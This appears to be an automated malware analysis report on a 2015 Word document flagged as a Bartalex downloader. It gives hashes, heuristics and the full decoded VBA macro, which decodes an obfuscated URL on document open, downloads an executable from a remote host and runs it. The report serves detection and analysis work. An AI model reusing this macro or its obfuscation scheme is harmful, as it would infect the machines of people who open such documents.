Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b677f0fcc8c39c6c…

MALICIOUS

Office (OLE)

111.0 KB Created: 2015-07-08 15:41:00 Authoring application: Microsoft Office Word First seen: 2015-09-19
MD5: 14fad0cfcecadf7e6cd8ca43a733cd50 SHA-1: 90a8f5a965de627d5b75387dc644bda297cc0b23 SHA-256: b677f0fcc8c39c6ce97b3da7db86b4a9e8ca7bac850a04b7f3d85716e52059bf
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains VBA macros that utilize the URLDownloadToFileA API to download a file from a remote location. It also references ShellExecuteA, indicating an intent to execute the downloaded content. The ClamAV detection name 'Doc.Downloader.Bartalex-6755229-0' further supports its role as a downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2825 bytes
SHA-256: 84641e9e6a71780b5fe9a28e93f0aaf4543620e854090223cec17baa96b1b3ec
Detection
ClamAV: No threats found
Obfuscation or payload: likely
32 of 54 identifiers look randomly generated (e.g. 'oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: UuUgZspLiGyuGWmHvEcWACjDIQFmu
Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32.dll" Alias "ShellExecuteA" (ByVal efdiSLTxKJZegXxMEpWYtVbpzThUHiEDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal ACjDIQFmuvtyVdkNbZquxoNdUFnpKnrFBkyXXyHTwP As String, ByVal vSlKlwqIrOyIOKWnCJLUsnQSz As String, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRBAooPX As String, ByVal kMgLjBNBztLIfOZfbnEFbclJqTj As Long) As Long
Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
Dim oAOwNzDeRPJcYvRqvsDGVr As String, sBLGkzSmFApUefdiSLTxKJ As String, ZegXxMEpWYtVbpzThUHiEDgMeQ As String, vtyVdkNbZquxoNdUFnpKnrFBkyXXy As String, HTwPvSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxw As String, BmtAQrrGwzrPtXVDsMDuHRBAooPXkM As String, vSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxwBm As String, tAQrrGwzrPtXVDsMDuHRBAooPXkMgLjBNBztLIfOZfbnEFbcl As String
Private Function gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
    Dim fdiSLTxKJZegXxMEpWYtVbpz, ThUHiEDgMeQUuUgZspLiGyuGWm, HvEcWACjDIQFmuvtyVdkNb
y = Len(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
For x = y To 1 Step -1
     JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo = Mid(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe, x, 1)
     AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef = AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef & JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo
Next
 For ThUHiEDgMeQUuUgZspLiGyuGWm = 1 To Len(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef)
        fdiSLTxKJZegXxMEpWYtVbpz = Mid(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef, ThUHiEDgMeQUuUgZspLiGyuGWm, 1)
        HvEcWACjDIQFmuvtyVdkNb = HvEcWACjDIQFmuvtyVdkNb & Chr(Asc(fdiSLTxKJZegXxMEpWYtVbpz) - 1)
    Next
    gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ = HvEcWACjDIQFmuvtyVdkNb
End Function
Private Sub UuUgZspLiGyuGWmHvEcWACjDIQFmu()
NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
GFNGhdrghsDFBDFgbdgF 0, "open", Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()

UuUgZspLiGyuGWmHvEcWACjDIQFmu
End Sub